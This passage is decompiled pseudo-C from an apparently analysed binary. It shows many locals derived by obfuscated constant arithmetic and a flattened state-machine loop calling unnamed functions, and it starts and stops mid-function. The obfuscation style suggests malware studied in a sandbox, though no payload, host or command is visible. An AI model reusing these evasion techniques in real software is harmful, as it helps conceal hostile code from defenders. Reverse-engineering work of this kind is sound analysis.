				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				unsigned int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				unsigned int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _t1135;
				signed int _t1138;
				signed int _t1140;
				signed int _t1144;
				signed int _t1172;
				void* _t1186;
				signed int _t1199;
				void* _t1213;
				signed int _t1218;
				signed int _t1224;
				signed int _t1257;
				signed int _t1336;
				signed int _t1340;
				signed int _t1348;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1366;
				signed int _t1367;
				signed int _t1368;
				signed int _t1369;
				signed int _t1370;
				signed int _t1371;
				signed int _t1372;
				void* _t1384;
				signed int _t1385;
				void* _t1387;
				void* _t1389;
				void* _t1391;
				void* _t1392;
				void* _t1393;

				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
				_v596 = 0x54d1;
				_t1225 = 0x2a32d0a;
				_t1351 = 0x66;
				_v596 = _v596 / _t1351;
				_t1352 = 0x6b;
				_v596 = _v596 / _t1352;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x00002830;
				_v416 = 0xcdcb;
				_v416 = _v416 + 0x2116;
				_t1353 = 0x1f;
				_v416 = _v416 * 0x30;
				_v416 = _v416 ^ 0x002c9323;
				_v488 = 0x9982;
				_v488 = _v488 | 0x10c88477;
				_v488 = _v488 ^ 0xa41c88c2;
				_v488 = _v488 / _t1353;
				_v488 = _v488 ^ 0x05d51165;
				_v496 = 0x77c8;
				_v496 = _v496 >> 3;
				_t1354 = 0xa;
				_v496 = _v496 / _t1354;
				_v496 = _v496 << 7;
				_v496 = _v496 ^ 0x0000cb31;
				_v232 = 0x48c9;
				_v232 = _v232 << 0xe;
				_v232 = _v232 ^ 0x12321472;
				_v360 = 0x3c3d;
				_t1218 = 5;
				_v360 = _v360 / _t1218;
				_v360 = _v360 * 0x2f;
				_v360 = _v360 ^ 0x000268e3;
				_v176 = 0x1856;
				_v176 = _v176 * 0x70;
				_v176 = _v176 ^ 0x000ab2a8;
				_v264 = 0xa86e;
				_v264 = _v264 + 0xffff13b3;
				_v264 = _v264 ^ 0xffffefbf;
				_v376 = 0x5423;
				_v376 = _v376 + 0xffffd432;
				_v376 = _v376 | 0x32249576;
				_v376 = _v376 ^ 0x3224c778;
				_v248 = 0xe66f;
				_v248 = _v248 >> 9;
				_v248 = _v248 ^ 0x000023ba;
				_v308 = 0x205b;
				_v308 = _v308 + 0xffff1f5e;
				_v308 = _v308 << 8;
				_v308 = _v308 ^ 0xff3fb884;
				_v484 = 0x592;
				_v484 = _v484 + 0xffffd519;
				_v484 = _v484 | 0x759ff25f;
				_v484 = _v484 + 0x87eb;
				_v484 = _v484 ^ 0x00008574;
				_v168 = 0x6ddb;
				_v168 = _v168 | 0x6e943d07;
				_v168 = _v168 ^ 0x6e944d9a;
				_v200 = 0xd6b0;
				_v200 = _v200 + 0xffff46fa;
				_v200 = _v200 ^ 0x00002650;
				_v452 = 0x246b;
				_v452 = _v452 ^ 0x586b7630;
				_v452 = _v452 << 0xc;
				_v452 = _v452 + 0xd57e;
				_v452 = _v452 ^ 0xb526cd97;
				_v348 = 0xfa69;
				_t1340 = 0x52;
				_t1355 = 0x65;
				_v348 = _v348 * 0x65;
				_v348 = _v348 | 0xab757825;
				_v348 = _v348 ^ 0xab77a96f;
				_v324 = 0xa741;
				_v324 = _v324 ^ 0x4f747397;
				_v324 = _v324 / _t1340;
				_v324 = _v324 ^ 0x00f83cd8;
				_v296 = 0x788d;
				_v296 = _v296 ^ 0x0ef2968d;
				_v296 = _v296 ^ 0x495ddb9a;
				_v296 = _v296 ^ 0x47af2616;
				_v220 = 0xb89f;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 ^ 0x000056af;
				_v520 = 0x12ce;
				_v520 = _v520 + 0xe747;
				_v520 = _v520 << 7;
				_v520 = _v520 | 0x5b07959e;
				_v520 = _v520 ^ 0x5b7fa869;
				_v208 = 0xa95c;
				_v208 = _v208 + 0xffff5ee2;
				_v208 = _v208 ^ 0x00000a9e;
				_v172 = 0xa2eb;
				_v172 = _v172 * 0x79;
				_v172 = _v172 ^ 0x004d63d4;
				_v180 = 0x98a7;
				_v180 = _v180 | 0x8ae8094c;
				_v180 = _v180 ^ 0x8ae8e600;
				_v424 = 0xd5a0;
				_v424 = _v424 << 5;
				_v424 = _v424 / _t1355;
				_v424 = _v424 ^ 0x00007145;
				_v392 = 0x548d;
				_v392 = _v392 + 0xffff9ec2;
				_v392 = _v392 + 0xffffa1fb;
				_v392 = _v392 ^ 0xffff9dba;
				_v340 = 0x6e45;
				_t1356 = 0x16;
				_v340 = _v340 / _t1356;
				_v340 = _v340 + 0xffff4bce;
				_v340 = _v340 ^ 0xffff3c02;
				_v536 = 0xbde4;
				_v536 = _v536 * 0x7f;
				_v536 = _v536 ^ 0x574a5eba;
				_v536 = _v536 << 0xd;
				_v536 = _v536 ^ 0x8d54c30e;
				_v284 = 0x7ef6;
				_v284 = _v284 + 0x9ef0;
				_v284 = _v284 ^ 0x00015c31;
				_v408 = 0xc211;
				_v408 = _v408 ^ 0x3543d7c0;
				_v408 = _v408 * 0x2b;
				_v408 = _v408 ^ 0xf244fbb0;
				_v588 = 0x856b;
				_v588 = _v588 ^ 0xfc1cd259;
				_v588 = _v588 ^ 0x7d294751;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 ^ 0x000240de;
				_v508 = 0x646a;
				_t1357 = 0x1e;
				_v508 = _v508 / _t1357;
				_t1358 = 0x35;
				_v508 = _v508 / _t1358;
				_v508 = _v508 * 0x5a;
				_v508 = _v508 ^ 0x00003cc0;
				_v472 = 0x196b;
				_v472 = _v472 * 0x16;
				_v472 = _v472 + 0x8cdc;
				_v472 = _v472 ^ 0x6344539c;
				_v472 = _v472 ^ 0x6346dd33;
				_v212 = 0xb705;
				_v212 = _v212 << 7;
				_v212 = _v212 ^ 0x005bff43;
				_v312 = 0xb48f;
				_v312 = _v312 + 0xffff701f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 ^ 0x00001302;
				_v480 = 0xed6e;
				_v480 = _v480 | 0x6be3eced;
				_v480 = _v480 + 0x4979;
				_v480 = _v480 ^ 0x6be47f6f;
				_v204 = 0xd35b;
				_v204 = _v204 >> 8;
				_v204 = _v204 ^ 0x00000622;
				_v456 = 0xd2fa;
				_v456 = _v456 << 3;
				_v456 = _v456 + 0xffffd4b1;
				_v456 = _v456 << 4;
				_v456 = _v456 ^ 0x0066f5d7;
				_v464 = 0x5ee1;
				_v464 = _v464 >> 9;
				_v464 = _v464 | 0xf1defbea;
				_v464 = _v464 ^ 0xf1de88d3;
				_v304 = 0x5962;
				_v304 = _v304 ^ 0xf5db8de9;
				_v304 = _v304 | 0xcdcbde78;
				_v304 = _v304 ^ 0xfddba732;
				_v196 = 0xf258;
				_v196 = _v196 << 7;
				_v196 = _v196 ^ 0x007971a7;
				_v448 = 0xfcbd;
				_v448 = _v448 | 0x39b7afc5;
				_v448 = _v448 * 0x70;
				_v448 = _v448 | 0x0e40c0bc;
				_v448 = _v448 ^ 0x4e7fac25;
				_v412 = 0x82bf;
				_v412 = _v412 | 0xb02f6e2d;
				_v412 = _v412 + 0xffff8626;
				_v412 = _v412 ^ 0xb02f1cac;
				_v396 = 0xa4bf;
				_v396 = _v396 ^ 0xb063c23f;
				_v396 = _v396 >> 0xf;
				_v396 = _v396 ^ 0x00011327;
				_v592 = 0x3de9;
				_v592 = _v592 + 0xffff189b;
				_v592 = _v592 * 0x3e;
				_v592 = _v592 + 0xffff8de2;
				_v592 = _v592 ^ 0xffd6d64a;
				_v404 = 0x86b0;
				_v404 = _v404 >> 5;
				_v404 = _v404 | 0x66bae114;
				_v404 = _v404 ^ 0x66bacebe;
				_v268 = 0x5937;
				_v268 = _v268 + 0xb57c;
				_v268 = _v268 ^ 0x00015145;
				_v280 = 0x9a1f;
				_v280 = _v280 + 0xffffa2eb;
				_v280 = _v280 ^ 0x000041dd;
				_v572 = 0xebd0;
				_v572 = _v572 ^ 0xedb0bf00;
				_t1359 = 0x32;
				_v572 = _v572 / _t1359;
				_v572 = _v572 << 1;
				_v572 = _v572 ^ 0x09819433;
				_v468 = 0x3364;
				_v468 = _v468 + 0xffff353c;
				_v468 = _v468 + 0x9f63;
				_v468 = _v468 | 0x0336228b;
				_v468 = _v468 ^ 0x0336362e;
				_v580 = 0x8c54;
				_v580 = _v580 | 0xf7fe7ffd;
				_v580 = _v580 << 2;
				_v580 = _v580 ^ 0xdffb9211;
				_v400 = 0xc44;
				_v400 = _v400 | 0x703220aa;
				_v400 = _v400 + 0x556b;
				_v400 = _v400 ^ 0x70328daf;
				_v316 = 0xc625;
				_t1360 = 0x2f;
				_v316 = _v316 / _t1360;
				_v316 = _v316 | 0xad0f9139;
				_v316 = _v316 ^ 0xad0f9a77;
				_v352 = 0x3bfc;
				_v352 = _v352 ^ 0x3d91e4fd;
				_v352 = _v352 << 4;
				_v352 = _v352 ^ 0xd91d9102;
				_v188 = 0xbf9d;
				_v188 = _v188 ^ 0xeb169de8;
				_v188 = _v188 ^ 0xeb160ae0;
				_v272 = 0xf610;
				_v272 = _v272 >> 0xc;
				_v272 = _v272 ^ 0x000001f5;
				_v500 = 0xa952;
				_v500 = _v500 ^ 0x762f8db9;
				_t1361 = 0x7b;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 | 0x4a766c6e;
				_v500 = _v500 ^ 0xca77b322;
				_v420 = 0xb3ce;
				_v420 = _v420 | 0x5d2bbb9b;
				_v420 = _v420 + 0x97cf;
				_v420 = _v420 ^ 0x5d2c523b;
				_v276 = 0x9f6f;
				_v276 = _v276 + 0x6bc4;
				_v276 = _v276 ^ 0x00010aa4;
				_v504 = 0x2102;
				_v504 = _v504 >> 7;
				_v504 = _v504 + 0xffff0b4b;
				_v504 = _v504 << 4;
				_v504 = _v504 ^ 0xfff0cd66;
				_v320 = 0xeb7e;
				_v320 = _v320 / _t1361;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x001ed973;
				_v512 = 0x61aa;
				_v512 = _v512 | 0xfdc9feff;
				_t1362 = 0x42;
				_v512 = _v512 / _t1362;
				_v512 = _v512 ^ 0x03d81aae;
				_v540 = 0x929f;
				_t1363 = 3;
				_v540 = _v540 * 0x59;
				_v540 = _v540 ^ 0xd582cfd5;
				_v540 = _v540 + 0xffff6c6f;
				_v540 = _v540 ^ 0xd5af900c;
				_v332 = 0xd4e0;
				_v332 = _v332 | 0xf04e42e2;
				_v332 = _v332 ^ 0xcda3b68f;
				_v332 = _v332 ^ 0x3ded4bfa;
				_v192 = 0xb136;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x00000257;
				_v460 = 0xb4b8;
				_v460 = _v460 + 0xffff8599;
				_v460 = _v460 / _t1363;
				_v460 = _v460 + 0x6faa;
				_v460 = _v460 ^ 0x0000d8b1;
				_v548 = 0x6ab8;
				_t1364 = 0x7c;
				_v548 = _v548 * 0x71;
				_v548 = _v548 / _t1364;
				_v548 = _v548 << 4;
				_v548 = _v548 ^ 0x00063121;
				_v260 = 0x579;
				_v260 = _v260 >> 0xd;
				_v260 = _v260 ^ 0x00001a36;
				_v380 = 0x5d49;
				_t1365 = 0x3a;
				_v380 = _v380 * 0x2a;
				_v380 = _v380 << 0xf;
				_v380 = _v380 ^ 0xa6fd05f8;
				_v584 = 0x9575;
				_v584 = _v584 << 0xe;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 >> 9;
				_v584 = _v584 ^ 0x00001953;
				_v388 = 0x71ed;
				_v388 = _v388 | 0xfa0f4c1a;
				_v388 = _v388 * 0x21;
				_v388 = _v388 ^ 0x3bff2db3;
				_v576 = 0x40ac;
				_v576 = _v576 ^ 0x72872e3c;
				_v576 = _v576 >> 3;
				_v576 = _v576 >> 6;
				_v576 = _v576 ^ 0x00395cc8;
				_v356 = 0x9a14;
				_v356 = _v356 * 5;
				_v356 = _v356 / _t1365;
				_v356 = _v356 ^ 0x00000d15;
				_v364 = 0x97d4;
				_v364 = _v364 + 0xffff1281;
				_v364 = _v364 << 0xd;
				_v364 = _v364 ^ 0xf54ac276;
				_v568 = 0x9f15;
				_v568 = _v568 + 0xffff08f5;
				_v568 = _v568 * 0x54;
				_v568 = _v568 + 0x8411;
				_v568 = _v568 ^ 0xffe3bf59;
				_v372 = 0xb5ac;
				_v372 = _v372 | 0xef292143;
				_v372 = _v372 << 0xc;
				_v372 = _v372 ^ 0x9b5ed191;
				_v560 = 0xc079;
				_v560 = _v560 << 6;
				_v560 = _v560 | 0x75378a54;
				_v560 = _v560 + 0xffff0fb6;
				_v560 = _v560 ^ 0x7536a745;
				_v252 = 0xffdd;
				_v252 = _v252 ^ 0x94fd4b64;
				_v252 = _v252 ^ 0x94fd9346;
				_v344 = 0x2817;
				_v344 = _v344 + 0xffffb9ce;
				_v344 = _v344 >> 5;
				_v344 = _v344 ^ 0x07ffc707;
				_v544 = 0xc4c3;
				_v544 = _v544 << 4;
				_v544 = _v544 | 0xf37ee84d;
				_v544 = _v544 >> 9;
				_v544 = _v544 ^ 0x0079cb8a;
				_v244 = 0xbe83;
				_v244 = _v244 << 9;
				_v244 = _v244 ^ 0x017d70fa;
				_v552 = 0x87b1;
				_v552 = _v552 + 0xe2ec;
				_v552 = _v552 + 0xffff8757;
				_t1366 = 0x57;
				_v552 = _v552 / _t1366;
				_v552 = _v552 ^ 0x00000cf8;
				_v524 = 0x9ee8;
				_v524 = _v524 >> 0xc;
				_v524 = _v524 + 0xffffea20;
				_v524 = _v524 + 0x67c2;
				_v524 = _v524 ^ 0x0000257d;
				_v240 = 0x3e44;
				_t1367 = 0x4e;
				_v240 = _v240 * 0x26;
				_v240 = _v240 ^ 0x000944b9;
				_v184 = 0xb17e;
				_v184 = _v184 + 0xc83;
				_v184 = _v184 ^ 0x00008468;
				_v428 = 0x2247;
				_v428 = _v428 >> 6;
				_v428 = _v428 | 0xbf36a58a;
				_v428 = _v428 ^ 0xbf36942e;
				_v492 = 0xaf88;
				_v492 = _v492 | 0x489e17bf;
				_v492 = _v492 / _t1367;
				_t1368 = 0x59;
				_v492 = _v492 / _t1368;
				_v492 = _v492 ^ 0x00028cc4;
				_v236 = 0x579b;
				_v236 = _v236 | 0x958cbadb;
				_v236 = _v236 ^ 0x958cb114;
				_v528 = 0x596e;
				_t1369 = 0x25;
				_v528 = _v528 / _t1369;
				_v528 = _v528 + 0xffff0f20;
				_v528 = _v528 * 0x71;
				_v528 = _v528 ^ 0xff96cb88;
				_v384 = 0xdb4f;
				_v384 = _v384 / _t1340;
				_v384 = _v384 ^ 0x047c7efe;
				_v384 = _v384 ^ 0x047c6269;
				_v256 = 0x2cf1;
				_v256 = _v256 | 0x808b3cca;
				_v256 = _v256 ^ 0x808b1c76;
				_v300 = 0x3901;
				_t1370 = 0x6d;
				_v300 = _v300 * 0xa;
				_v300 = _v300 >> 6;
				_v300 = _v300 ^ 0x0000212b;
				_v368 = 0x796e;
				_v368 = _v368 * 0xc;
				_v368 = _v368 * 0x3e;
				_v368 = _v368 ^ 0x0160b691;
				_v444 = 0xa0b9;
				_v444 = _v444 | 0x9ca1dfa8;
				_v444 = _v444 / _t1370;
				_v444 = _v444 * 0x63;
				_v444 = _v444 ^ 0x8e437e2f;
				_v532 = 0x8c65;
				_v532 = _v532 * 0x56;
				_v532 = _v532 << 0xa;
				_v532 = _v532 * 0x21;
				_v532 = _v532 ^ 0x519e8d1f;
				_v556 = 0x4a7f;
				_v556 = _v556 << 0xf;
				_v556 = _v556 + 0xa5c2;
				_v556 = _v556 | 0xa1707f4f;
				_v556 = _v556 ^ 0xa5705fb9;
				_v436 = 0x3fda;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 + 0x1364;
				_v436 = _v436 ^ 0xe1573554;
				_v436 = _v436 ^ 0xe158f097;
				_v564 = 0x6043;
				_v564 = _v564 | 0xb689377f;
				_v564 = _v564 >> 8;
				_v564 = _v564 ^ 0x2a62422c;
				_v564 = _v564 ^ 0x2ad4e10a;
				_v328 = 0x5c6e;
				_v328 = _v328 ^ 0x42ae754b;
				_v328 = _v328 + 0xbaa3;
				_v328 = _v328 ^ 0x42aeef53;
				_v228 = 0xef63;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x00001997;
				_v336 = 0x5044;
				_v336 = _v336 >> 0xf;
				_v336 = _v336 + 0xffffb35b;
				_v336 = _v336 ^ 0xffffef5d;
				_v440 = 0x7004;
				_v440 = _v440 * 0x7e;
				_v440 = _v440 * 0x13;
				_v440 = _v440 << 0x10;
				_v440 = _v440 ^ 0x85685bd2;
				_v164 = 0x75ea;
				_v164 = _v164 << 0xb;
				_v164 = _v164 ^ 0x03af40f2;
				_v224 = 0xc6cf;
				_v224 = _v224 << 9;
				_v224 = _v224 ^ 0x018dae64;
				_v160 = 0xb450;
				_t1371 = 0x38;
				_v160 = _v160 / _t1371;
				_v160 = _v160 ^ 0x00003b29;
				_v476 = 0xddbc;
				_v476 = _v476 ^ 0xc2407c95;
				_v476 = _v476 + 0xd5a3;
				_v476 = _v476 + 0x8192;
				_v476 = _v476 ^ 0xc241f0f2;
				_v216 = 0xdff2;
				_t1372 = 0x2c;
				_v216 = _v216 * 0x1c;
				_v216 = _v216 ^ 0x00187743;
				_v516 = 0x400b;
				_v516 = _v516 / _t1218;
				_v516 = _v516 + 0xc836;
				_v516 = _v516 >> 0xa;
				_v516 = _v516 ^ 0x00004f08;
				_v292 = 0xdc4e;
				_v292 = _v292 * 0x16;
				_v292 = _v292 * 0x7f;
				_v292 = _v292 ^ 0x09643e15;
				_v600 = 0x4d46;
				_v600 = _v600 + 0xffff0db8;
				_v600 = _v600 + 0x84f3;
				_v600 = _v600 + 0xc039;
				_v600 = _v600 ^ 0x0000d5ed;
				_v432 = 0x8bd1;
				_v432 = _v432 << 0xc;
				_v432 = _v432 + 0x8a22;
				_v432 = _v432 / _t1372;
				_v432 = _v432 ^ 0x003284c4;
				_v288 = 0x245c;
				_v288 = _v288 | 0x526859ae;
				_v288 = _v288 * 0xc;
				_v288 = _v288 ^ 0xdce5b0ef;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t1391 = _t1225 - 0x1bd1caec;
							if(_t1391 <= 0) {
							}
							L3:
							if(_t1391 == 0) {
								__eflags = E002502C3();
								if(__eflags == 0) {
									_t1135 = E00247903();
									asm("sbb ecx, ecx");
									_t1225 = ( ~_t1135 & 0x0209e55e) + 0x3544b2a;
									while(1) {
										L2:
										_t1391 = _t1225 - 0x1bd1caec;
										if(_t1391 <= 0) {
										}
										goto L3;
									}
								}
								_t1144 = E00247903();
								asm("sbb ecx, ecx");
								_t1257 =  ~_t1144 & 0x03449ef9;
								L32:
								_t1225 = _t1257 + 0xda99535;
								while(1) {
									L2:
									_t1391 = _t1225 - 0x1bd1caec;
									if(_t1391 <= 0) {
									}
									goto L54;
								}
								goto L3;
							}
							_t1392 = _t1225 - 0x10ee342e;
							if(_t1392 > 0) {
								__eflags = _t1225 - 0x15603e6b;
								if(__eflags > 0) {
									__eflags = _t1225 - 0x159448ba;
									if(_t1225 == 0x159448ba) {
										E0024C562(_v540,  &_v80, _v332, _v192);
										_t1225 = 0x17799f6a;
										continue;
									}
									__eflags = _t1225 - 0x1653011b;
									if(_t1225 == 0x1653011b) {
										E0024F536(_v384, _v256, _v300, _v140);
										_t1225 = 0x21caf663;
										continue;
									}
									__eflags = _t1225 - 0x17799f6a;
									if(_t1225 == 0x17799f6a) {
										_t1138 = E00249A37( &_v112,  &_v132, _v460, _v548);
										asm("sbb ecx, ecx");
										_t1225 = ( ~_t1138 & 0x1d975e2e) + 0x7ff6f9b;
										continue;
									}
									__eflags = _t1225 - 0x1b19f75b;
									if(_t1225 != 0x1b19f75b) {
										break;
									}
									_t1144 = E002573AC();
									asm("sbb ecx, ecx");
									_t1225 = ( ~_t1144 & 0x1b44a5c9) + 0x1bd1caec;
									continue;
								}
								if(__eflags == 0) {
									_t1144 = E0024F444(_t1225);
									L112:
									return _t1144;
								}
								__eflags = _t1225 - 0x10f69b27;
								if(_t1225 == 0x10f69b27) {
									_t1144 = E0025AB96();
									_t1225 = 0x326a8235;
									continue;
								}
								__eflags = _t1225 - 0x11454f34;
								if(_t1225 == 0x11454f34) {
									_t1144 = E0024D7EB();
									_t1225 = 0x356cf65c;
									continue;
								}
								__eflags = _t1225 - 0x11dfa862;
								if(__eflags == 0) {
									_t1225 = 0x376e2cde;
									continue;
								}
								__eflags = _t1225 - 0x13c96655;
								if(_t1225 != 0x13c96655) {
									break;
								}
								_t1144 = E002462A3();
								goto L112;
							}
							if(_t1392 == 0) {
								_t1140 = E0024153C();
								asm("sbb ecx, ecx");
								_t1257 =  ~_t1140 & 0x061fd120;
								__eflags = _t1257;
								goto L32;
							}
							_t1393 = _t1225 - 0x55e3088;
							if(_t1393 > 0) {
								__eflags = _t1225 - 0x7ff6f9b;
								if(_t1225 == 0x7ff6f9b) {
									_t1336 = _v436;
									E0024F536(_v556, _t1336, _v564, _v80);
									_t1225 = 0x3140af28;
									continue;
								}
								__eflags = _t1225 - 0xb356ed5;
								if(_t1225 == 0xb356ed5) {
									_t1144 = E0024C2E2();
									_v104 = _t1144;
									_t1225 = 0x288da576;
									continue;
								}
								__eflags = _t1225 - 0xd8c7d27;
								if(_t1225 == 0xd8c7d27) {
									_push( &_v68);
									_t1336 = _v572;
									_t1144 = E00252349(_v280, _t1336, _v468, _v580, _t1225);
									_t1387 = _t1387 + 0x10;
									__eflags = _t1144;
									if(__eflags == 0) {
										L28:
										_t1225 = 0x15603e6b;
										continue;
									}
									_t1336 = _v316;
									_v112 =  &_v68;
									_t1144 = E0024DFE2(_v400, _t1336,  &_v68);
									_v108 = _t1144;
									_t1225 = 0x2267098;
									continue;
								}
								__eflags = _t1225 - 0xda99535;
								if(_t1225 != 0xda99535) {
									break;
								}
								E00257D03();
								_t1144 = E00248317();
								L25:
								_t1225 = 0x23233137;
								continue;
							}
							if(_t1393 == 0) {
								_t1144 = E002563C1();
								_t1225 = 0x3544b2a;
								continue;
							}
							if(_t1225 == 0x13a2b08) {
								_t1225 = 0x282d346f;
								continue;
							}
							if(_t1225 == 0x2267098) {
								_t1144 = E0025611C();
								_v72 = _t1144;
								_t1225 = 0xb356ed5;
								continue;
							}
							if(_t1225 == 0x2a32d0a) {
								_t1225 = 0x34a6f88;
								continue;
							}
							if(_t1225 == 0x34a6f88) {
								_t1144 = E00253632(__eflags);
								__eflags = _t1144;
								if(__eflags == 0) {
									goto L112;
								} else {
									_t1225 = 0x3833d453;
									continue;
								}
							}
							if(_t1225 != 0x3544b2a) {
								break;
							} else {
								_t1144 = E00251BDF();
								_t1225 = 0x371670b5;
								continue;
							}
							L54:
							__eflags = _t1225 - 0x2e6b2744;
							if(__eflags > 0) {
								__eflags = _t1225 - 0x35bdcd5f;
								if(__eflags > 0) {
									__eflags = _t1225 - 0x371670b5;
									if(_t1225 == 0x371670b5) {
										E00258F49();
										_t1225 = 0x30491502;
										break;
									}
									__eflags = _t1225 - 0x376e2cde;
									if(__eflags == 0) {
										_v148 = E0024F85D(_v472, __eflags,  &_v144, _v212, _v312, _v480);
										E002448BD( &_v148, _v204, _v456, _v464);
										_t1387 = _t1387 + 0x18;
										_t1336 = _v148;
										E00252025(_v304, _t1336, _v196, _v448);
										_t1225 = 0x13a2b08;
										continue;
									}
									__eflags = _t1225 - 0x37f9587b;
									if(__eflags == 0) {
										_v96 = 0x1346150;
										_t1225 = 0x2e6b2744;
										continue;
									}
									__eflags = _t1225 - 0x3833d453;
									if(_t1225 != 0x3833d453) {
										break;
									}
									_t1144 = E00256014(); // executed
									_t1225 = 0x1e57e2ba;
									continue;
								}
								if(__eflags == 0) {
									_t1336 = _v320;
									_t1144 = E0025A0AF(_v504, _t1336, _v512,  &_v88);
									_t1225 = 0x159448ba;
									continue;
								}
								__eflags = _t1225 - 0x30491502;
								if(_t1225 == 0x30491502) {
									_t1144 = E0024EE78();
									__eflags = _t1144;
									if(__eflags == 0) {
										goto L112;
									}
									_t1225 = 0x2a91822d;
									continue;
								}
								__eflags = _t1225 - 0x3140af28;
								if(_t1225 == 0x3140af28) {
									_t1336 = _v228;
									_t1144 = E0024F536(_v328, _t1336, _v336, _v88);
									goto L25;
								}
								__eflags = _t1225 - 0x326a8235;
								if(__eflags == 0) {
									_t1336 =  &_v124;
									_t1144 = E002571EF(_t1336, __eflags, _v528);
									__eflags = _t1144;
									if(__eflags != 0) {
										asm("xorps xmm0, xmm0");
										asm("movlpd [esp+0x1d0], xmm0");
									}
									L95:
									_t1225 = 0x1653011b;
									continue;
								}
								__eflags = _t1225 - 0x356cf65c;
								if(_t1225 != 0x356cf65c) {
									break;
								}
								_t1144 = E002567F0();
								_t1225 = 0x13c96655;
								continue;
							}
							if(__eflags == 0) {
								_v92 = 0x1388;
								_t1225 = 0x35bdcd5f;
								continue;
							}
							__eflags = _t1225 - 0x23233137;
							if(__eflags > 0) {
								__eflags = _t1225 - 0x2596cdc9;
								if(_t1225 == 0x2596cdc9) {
									_push(_v388);
									_push(_v584);
									_push(_v380);
									_t1336 = _v260;
									_push( &_v132);
									_push( &_v140);
									_t1172 = E00249FDC(_t1336);
									_t1389 = _t1387 + 0x14;
									__eflags = _t1172;
									if(_t1172 == 0) {
										E0024790F();
										E002478A5(_t1225, _t1225, 0x1f40, _t1225, 0xfa0);
										_t1387 = _t1389 + 0x10;
										_t1144 = E00248317();
										_t1225 = 0x21caf663;
										asm("adc ebx, 0x0");
									} else {
										_t1384 = 0x35bdcd5f;
										_t1213 = E002478A5(_t1225, _t1225, 0xef420, _t1225, 0xdbba0);
										_t1387 = _t1389 + 0x10;
										_t1144 = E00248317();
										_t1224 = _t1336;
										_t1348 = _t1144 + _t1213;
										_t1225 = 0x21c9d3c7;
										asm("adc ebx, 0x0");
									}
									while(1) {
										L1:
										goto L2;
									}
								}
								__eflags = _t1225 - 0x282d346f;
								if(_t1225 == 0x282d346f) {
									_t1384 = 0xd8c7d27;
									_t1186 = E002478A5(_t1225, _t1225, 0x2ee0, _t1225, 0xfa0);
									_t1387 = _t1387 + 0x10;
									_t1144 = E00248317();
									_t1224 = _t1336;
									_t1348 = _t1144 + _t1186;
									_t1225 = 0x23233137;
									asm("adc ebx, 0x0");
									goto L1;
								}
								__eflags = _t1225 - 0x288da576;
								if(_t1225 == 0x288da576) {
									_t1144 = E0024F326();
									_v100 = _t1144;
									_t1225 = 0x37f9587b;
									continue;
								}
								__eflags = _t1225 - 0x2a91822d;
								if(_t1225 != 0x2a91822d) {
									break;
								}
								E00253895();
								_t1144 = E00247903();
								asm("sbb ecx, ecx");
								_t1225 = ( ~_t1144 & 0xdbd858d8) + 0x356cf65c;
								continue;
							}
							if(__eflags == 0) {
								_t1144 = _t1348 | _t1224;
								__eflags = _t1144;
								if(_t1144 != 0) {
									_t1199 = E002478A5(_t1225, _t1225, 0x4b0, _t1225, 0x190);
									_t1387 = _t1387 + 8;
									_t1336 = _t1199;
									_t1144 = E00253F62(_t1336, __eflags);
									__eflags = _t1144;
									if(__eflags != 0) {
										goto L28;
									}
									_t1144 = E00248317();
									__eflags = _t1336 - _t1224;
									if(__eflags < 0) {
										L74:
										_t1225 = 0x23233137;
										break;
									}
									if(__eflags > 0) {
										goto L69;
									}
									__eflags = _t1144 - _t1348;
									if(_t1144 >= _t1348) {
										goto L69;
									}
									goto L74;
								}
								L69:
								_t1225 = _t1384;
								break;
							}
							__eflags = _t1225 - 0x1d55cf6f;
							if(_t1225 == 0x1d55cf6f) {
								_t1144 = E002512E2();
								goto L112;
							}
							__eflags = _t1225 - 0x1e57e2ba;
